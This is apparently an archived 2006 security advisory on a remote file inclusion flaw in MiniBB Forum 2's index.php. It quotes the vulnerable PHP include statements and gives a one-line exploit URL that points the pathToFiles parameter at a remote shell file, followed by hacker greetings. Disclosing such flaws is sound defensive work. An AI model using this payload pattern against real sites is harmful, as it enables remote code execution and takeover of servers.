New Bug MiniBB Forum <= 2 Remote File Include (index.php)

2006-11-14T00:00:00
ID SECURITYVULNS:DOC:15040
Type securityvulns
Reporter Securityvulns
Modified 2006-11-14T00:00:00

Description

Title : MiniBB Forum <= 2 Remote File Include (index.php)

Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}


Sorce Code: http://www.minibb.net/download.php?file=minibb20


Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : MiniBB Forum 2 (index.php)version : version [ 2 ] exploit :Remote File Include



Vulnerable Code: include ($pathToFiles.'setup_'.$DB.'.php'); include ($pathToFiles.'bb_cookie.php'); include ($pathToFiles.'bb_functions.php'); include ($pathToFiles.'bb_specials.php');


Exploit: http://www.VicTim.com/[Script_Path]/index.php?pathToFiles=Shell.txt?

------------------------------------------------------------------------

greetz: Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco

Special Greeting:AsbMay's Group

channel:www.asb-may.net

contact:spoonman500[at]hotmail[dot]com


MSN Hotmail sur i-mode™ : envoyez et recevez des e-mails depuis votre telephone portable ! http://www.msn.fr/hotmailimode/